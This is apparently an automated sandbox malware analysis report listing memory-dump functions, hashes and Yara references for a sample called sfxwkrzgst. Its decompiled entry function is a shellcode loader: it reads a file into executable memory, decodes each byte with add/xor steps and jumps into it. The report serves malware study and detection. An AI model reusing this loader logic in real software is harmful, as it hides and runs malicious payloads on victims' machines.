                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 1e001322639cc478076f0aeba9eb7c1c59b9d126d59ec3677524c20280ebe012
                                  • Instruction ID: 111d42dededef8c2c475a282c70f370bfecbec6ce36c6d9aaf438b929fea2fef
                                  • Opcode Fuzzy Hash: 1e001322639cc478076f0aeba9eb7c1c59b9d126d59ec3677524c20280ebe012
                                  • Instruction Fuzzy Hash: E5C012B1240104AB8601EE589C808AA73A9EFC4258B24841AF81A83252E632D8219AA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4280bebae3123cef7d52a02990505cc8a441ad6c0aca62ae3e0a814a98d1fd1e
                                  • Instruction ID: 340182fecc54c97667ff35601095d1472c1583bb915c872a72c12ad79e302ae3
                                  • Opcode Fuzzy Hash: 4280bebae3123cef7d52a02990505cc8a441ad6c0aca62ae3e0a814a98d1fd1e
                                  • Instruction Fuzzy Hash: 31B09B719114C5C9DA11D7B4460C717794077D0745F57C067D3020641B4778C0D1FAB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00406AB4 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 16%
                                  			E00406AB4(void* __esi) {

				asm("adc eax, 0xf0f42a51");
				asm("sbb dword [ecx-0x57], 0xffffffe5");
				return 1;
			}



                                  0x00406abb
                                  0x00406ac0
                                  0x00406ad4

                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c7aef8ca8326889e45b8c8dd2c4991aad73f2905a35ad3fa535b2dacc91cdb4
                                  • Instruction ID: c0bd1993aa229e4ce6cd3c7c1ffad2efdeffbe971b7b6ceec182d4ce7fb829b6
                                  • Opcode Fuzzy Hash: 9c7aef8ca8326889e45b8c8dd2c4991aad73f2905a35ad3fa535b2dacc91cdb4
                                  • Instruction Fuzzy Hash: 27C0123295160106D1248A18EC44270F364F743128F047367DC54EB1608243C042028C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9950 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42016e445d5ee063e67a4b4b6969653439d93da31135a802372d6b7fc32c3e1e
                                  • Instruction ID: 770c6af7677b6900b2019c0011692e95f16fe76a8b94f833688d7e44553c6e76
                                  • Opcode Fuzzy Hash: 42016e445d5ee063e67a4b4b6969653439d93da31135a802372d6b7fc32c3e1e
                                  • Instruction Fuzzy Hash: 369002A121140803D14065A948047074005A7D0342F52C025A3054555ECA698C517275
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E99D0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7538b1686891c14b40ec83fc554b12251d8707ee296a3254074c7d99af161daf
                                  • Instruction ID: 6e6a56ed1e62c5ac461abcefd103d30a4cf1e057a5e878fce4d1a89b3d95c304
                                  • Opcode Fuzzy Hash: 7538b1686891c14b40ec83fc554b12251d8707ee296a3254074c7d99af161daf
                                  • Instruction Fuzzy Hash: 0D9002A122100442D10461A944047064045A7E1241F52C026A3144554CC5698C617265
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9820 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf87e7b6f60b22f369ec802bbd5bf923ba2cf5299059138d1c4f0e5e7ba52d60
                                  • Instruction ID: 660c1fca4538d75c88dce7d0d6f0160b612f9e439288d8ae626e66b34437b3fc
                                  • Opcode Fuzzy Hash: cf87e7b6f60b22f369ec802bbd5bf923ba2cf5299059138d1c4f0e5e7ba52d60
                                  • Instruction Fuzzy Hash: 3990027125100802D14171A944047064009B7D0281F92C026A1414554EC6958A56BBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012EB040 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2cbc07c9388a63e65d637fef60cab9b5f136349fc1ba3851e5dd4cc75cb135d5
                                  • Instruction ID: 12e51e75fbf10a2d4ed66c585d5720d7e64240e7ec411f082471e437a7df91f2
                                  • Opcode Fuzzy Hash: 2cbc07c9388a63e65d637fef60cab9b5f136349fc1ba3851e5dd4cc75cb135d5
                                  • Instruction Fuzzy Hash: DB9002A1611144434540B1A948045069015B7E1341792C135A1444560CC6A88855B3A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E98A0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7d9f2158e7b0c5f62837d9b6b7d4745f6fe4b2be817fa249e7d834bceb50ee28
                                  • Instruction ID: 9d3d3b625dfd70941f7aee5babc36440a03939d571ba8af898c3feb63d221daa
                                  • Opcode Fuzzy Hash: 7d9f2158e7b0c5f62837d9b6b7d4745f6fe4b2be817fa249e7d834bceb50ee28
                                  • Instruction Fuzzy Hash: 9D90026131100802D10261A944147064009E7D1385F92C026E2414555DC6658953B272
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9B00 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d0da988b34edcb76a9ed118228746124a7cc19eea4a8086496c179332d76a845
                                  • Instruction ID: af8f83570e03f5ae5c81d6aa56c0f7644bc0ca2fe87b45eca94f13c9e39a6097
                                  • Opcode Fuzzy Hash: d0da988b34edcb76a9ed118228746124a7cc19eea4a8086496c179332d76a845
                                  • Instruction Fuzzy Hash: B590026125100C02D14071A984147074006E7D0641F52C025A1014554DC656896577F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012EA3B0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 141ea895abef7186b1b98aa992996260926671eb35c3c1fa4b6688e690461238
                                  • Instruction ID: 48e8207bfcd1b3be6f1539aa0e83b1d8b88ecf7162f841fc6b86b4e3ca2ad551
                                  • Opcode Fuzzy Hash: 141ea895abef7186b1b98aa992996260926671eb35c3c1fa4b6688e690461238
                                  • Instruction Fuzzy Hash: 4190027121144402D14071A9844470B9005B7E0341F52C425E1415554CC6558856B361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9A10 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: feef96ade828ec2d32826032e6dc9ec2a5fe4bf18efb9737313ecbc9f1a023fa
                                  • Instruction ID: 81e1394fd9cc845c927d9b4c82bdf78f1a6241012f040ed99e5ddf60ad121261
                                  • Opcode Fuzzy Hash: feef96ade828ec2d32826032e6dc9ec2a5fe4bf18efb9737313ecbc9f1a023fa
                                  • Instruction Fuzzy Hash: 7390027121140802D10061A948087474005A7D0342F52C025A6154555EC6A5C8917671
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9A80 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c2263760765a532072c121a28e547c08bce0e16f0dc2c36d1530de3834af3998
                                  • Instruction ID: 8344e746da5133542d8a88a1af3365bc9f15a293fb689761845834ba8550dc70
                                  • Opcode Fuzzy Hash: c2263760765a532072c121a28e547c08bce0e16f0dc2c36d1530de3834af3998
                                  • Instruction Fuzzy Hash: FD90026121144842D14062A94804B0F8105A7E1242F92C02DA5146554CC95588557761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eda9393a189492f8e5bfe35c9b9d376df579a4d63f985dc7070e1285ef066be5
                                  • Instruction ID: 8a5afdfff584f2dcb7516742b995a656d9eb8dc17949426fe350aab8b750374f
                                  • Opcode Fuzzy Hash: eda9393a189492f8e5bfe35c9b9d376df579a4d63f985dc7070e1285ef066be5
                                  • Instruction Fuzzy Hash: 5E9002E1211144924500A2A98404B0A8505A7E0241F52C02AE2044560CC5658851B275
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012EAD30 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 035e98fbdb716aadd712e4329e229d382bd7a6345391049f769b5e29a919dc1c
                                  • Instruction ID: db27874d6f6356e770d16020fa591ca2da7aa90648c2f234234963dd39703708
                                  • Opcode Fuzzy Hash: 035e98fbdb716aadd712e4329e229d382bd7a6345391049f769b5e29a919dc1c
                                  • Instruction Fuzzy Hash: FB900271A1500412914071A948147468006B7E0781F56C025A1504554CC9948A5573E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9560 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3a20b3be43afadc705083f9c36c0ca419a082c3ecf5547ba6a96d656653d32bb
                                  • Instruction ID: 72e801ae4330496937930b5042123f05c0fe4de839056032f81a10bb6a32dce8
                                  • Opcode Fuzzy Hash: 3a20b3be43afadc705083f9c36c0ca419a082c3ecf5547ba6a96d656653d32bb
                                  • Instruction Fuzzy Hash: 96900265231004020145A5A9060460B4445B7D6391792C029F2406590CC66188657361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E95F0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7b6478a4ab7650af301355f7d2174501cf3558129dc7f12f5c49ada3975e436f
                                  • Instruction ID: bccf5d17ac97971c6e46f5cb10dd64f84fd43f56f1c5891065eea6a49b77ad20
                                  • Opcode Fuzzy Hash: 7b6478a4ab7650af301355f7d2174501cf3558129dc7f12f5c49ada3975e436f
                                  • Instruction Fuzzy Hash: 2C90027121100C02D10461A948047864005A7D0341F52C025A7014655ED6A588917271
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9730 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1aadaa7896c1da2152822de27b980bfd06e09f94a1ab84d5d65ef1f226189d3
                                  • Instruction ID: 2aa0a25bd4db899926d1953a74ac94bdce48217e93d4ec8324d9dff9c7945b7e
                                  • Opcode Fuzzy Hash: f1aadaa7896c1da2152822de27b980bfd06e09f94a1ab84d5d65ef1f226189d3
                                  • Instruction Fuzzy Hash: 5390026161500802D14071A954187064015A7D0241F52D025A1014554DC6998A5577E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012EA710 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f44337a10cc8c48d5c13f9c067b30c1ae6af13576653d1d4e3e202754342a8a7
                                  • Instruction ID: a2897f49b7c6f02b8cdf6232cf201ad758f01bc9196458c1c2b2c733e3810325
                                  • Opcode Fuzzy Hash: f44337a10cc8c48d5c13f9c067b30c1ae6af13576653d1d4e3e202754342a8a7
                                  • Instruction Fuzzy Hash: 06900271311004529500A6E95804B4A8105A7F0341F52D029A5004554CC59488617261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9760 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e16419ae83b0be9a072d9c18ba2e8e2601378876be1c7a306c74082cb434f174
                                  • Instruction ID: d157a89739ebc38c24c64d1e21be1ebe53322d57d1f240453d67b875321ba3cc
                                  • Opcode Fuzzy Hash: e16419ae83b0be9a072d9c18ba2e8e2601378876be1c7a306c74082cb434f174
                                  • Instruction Fuzzy Hash: 5B90027121100803D10061A955087074005A7D0241F52D425A1414558DD69688517261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012EA770 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a5e65ebd56b78ab098c045bde9d05bdfa8723cb27d0c4277f98cb13d7a6a0910
                                  • Instruction ID: 0704f6faafb924e533383bf03a8c638ee803c7e6f190abeb351fcc074cefd0af
                                  • Opcode Fuzzy Hash: a5e65ebd56b78ab098c045bde9d05bdfa8723cb27d0c4277f98cb13d7a6a0910
                                  • Instruction Fuzzy Hash: 3890027521504842D50065A95804B874005A7D0345F52D425A141459CDC6948861B261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9770 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c79a2d7ce92a6bcdfc7453f94a6948bad15592a6fd8780c8520e2d3c43f35038
                                  • Instruction ID: f27cee70feb10dfa9fbde8509552dd79f157f95a020333d6ac4be4ce20b50131
                                  • Opcode Fuzzy Hash: c79a2d7ce92a6bcdfc7453f94a6948bad15592a6fd8780c8520e2d3c43f35038
                                  • Instruction Fuzzy Hash: 8C90026121504842D10065A95408B064005A7D0245F52D025A2054595DC6758851B271
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9610 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e63b32931366432fbd7d4a65c175147d285475f719c912933cc9cf254a67fc2
                                  • Instruction ID: 7864cc813c289a7b966de13bbdf691e88a0b09e91e03092424ae1881e2094645
                                  • Opcode Fuzzy Hash: 2e63b32931366432fbd7d4a65c175147d285475f719c912933cc9cf254a67fc2
                                  • Instruction Fuzzy Hash: 4B90027161500C02D15071A944147464005A7D0341F52C025A1014654DC7958A5577E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9650 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8133e4727fa91a040934515ba5e0a33595d485382a29ba0a5b6458c4f3f66acd
                                  • Instruction ID: 78d54343a5b735ca5e99f7972406bac47aac2abf98cd2e85f3317d4be200a1f1
                                  • Opcode Fuzzy Hash: 8133e4727fa91a040934515ba5e0a33595d485382a29ba0a5b6458c4f3f66acd
                                  • Instruction Fuzzy Hash: 0090027121504C42D14071A94404B464015A7D0345F52C025A1054694DD6658D55B7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E96D0 Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fe03e367e7265ef1cd70ab33f09428f14592e5fb17989bb0f51684932d808977
                                  • Instruction ID: 7f8ee52ee4de3bbd731e1a22ef429111b8ceb8997954a5378e9afa0ccf9ca255
                                  • Opcode Fuzzy Hash: fe03e367e7265ef1cd70ab33f09428f14592e5fb17989bb0f51684932d808977
                                  • Instruction Fuzzy Hash: 4890027121100C42D10061A94404B464005A7E0341F52C02AA1114654DC655C8517661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 012E9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335868702.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_1280000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: 79f87be1fcfa7dc3af87157c48090f20674f1f44aea0764501ff5203f8f8f4a1
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 009C1000 Relevance: 9.1, APIs: 6, Instructions: 95filememoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			_entry_() {
				int _v16;
				struct _OVERLAPPED* _v20;
				long _v28;
				void* _t48;
				long _t49;
				void* _t50;
				void* _t51;
				long _t77;
				void** _t78;

				_v20 = 0;
				_t48 = CreateFileW((CommandLineToArgvW(GetCommandLineW(),  &_v16))[1], 0x80000000, 1, 0, 3, 0x80, 0);
				if(_t48 != 0xffffffff) {
					_t49 = GetFileSize(_t48, 0);
					_t77 = _t49;
					_t50 = VirtualAlloc(0, _t49, 0x3000, 0x40);
					 *_t78 = _t50;
					_t4 = _t77 - 1; // -1
					_t48 = ReadFile(_t48, _t50, _t4,  &_v28, 0);
					if(_t48 != 0) {
						if(_t77 == 0) {
							L5:
							_t48 =  *_t78;
							goto __eax;
						}
						_t51 = 0;
						do {
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xb2;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x69;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xee;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xb5;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x50;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xa2;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) ^ 0x000000b8;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x88;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xa1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x13;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xcc;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x40;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xd8;
							 *( *_t78 + _t51) =  *( *_t78 + _t51) ^ 0x00000006;
							_t51 = _t51 + 1;
						} while (_t77 != _t51);
						goto L5;
					}
				}
				return _t48;
			}












                                  0x009c1008
                                  0x009c1031
                                  0x009c103a
                                  0x009c1044
                                  0x009c104a
                                  0x009c1055
                                  0x009c105b
                                  0x009c105e
                                  0x009c106a
                                  0x009c1072
                                  0x009c107a
                                  0x009c1111
                                  0x009c1111
                                  0x009c1114
                                  0x009c1114
                                  0x009c1080
                                  0x009c1082
                                  0x009c1085
                                  0x009c108c
                                  0x009c1092
                                  0x009c1098
                                  0x009c109f
                                  0x009c10a6
                                  0x009c10ac
                                  0x009c10b3
                                  0x009c10ba
                                  0x009c10c0
                                  0x009c10c7
                                  0x009c10ce
                                  0x009c10d5
                                  0x009c10dc
                                  0x009c10e2
                                  0x009c10e9
                                  0x009c10f0
                                  0x009c10f6
                                  0x009c10fd
                                  0x009c1104
                                  0x009c1108
                                  0x009c1109
                                  0x00000000
                                  0x009c1082
                                  0x009c1072
                                  0x009c111c

                                  APIs
                                  • GetCommandLineW.KERNEL32 ref: 009C100C
                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 009C1018
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 009C1031
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 009C1044
                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 009C1055
                                  • ReadFile.KERNEL32(00000000,00000000,-00000001,?,00000000), ref: 009C106A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335307274.00000000009C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009C0000, based on PE: true
                                  • Associated: 00000004.00000002.335289873.00000000009C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000004.00000002.335321067.00000000009C2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_9c0000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: File$CommandLine$AllocArgvCreateReadSizeVirtual
                                  • String ID:
                                  • API String ID: 4005432831-0
                                  • Opcode ID: e2e8c65b62e20bc440d5b6d00bad9f5e5b00ee7004caba8489a4a99600fe35d7
                                  • Instruction ID: f9d0860f3cc0db14978248b594a98d6a2eba75d40f9ec466966746852efbc90d
                                  • Opcode Fuzzy Hash: e2e8c65b62e20bc440d5b6d00bad9f5e5b00ee7004caba8489a4a99600fe35d7
                                  • Instruction Fuzzy Hash: 6A31453060C2819FD326EB24CCA4E39BBA9EF97714F15468CE1D25B6D2C7665C03D722
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0133FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E0133FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E012ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01335720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01335720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                  0x0133fdda
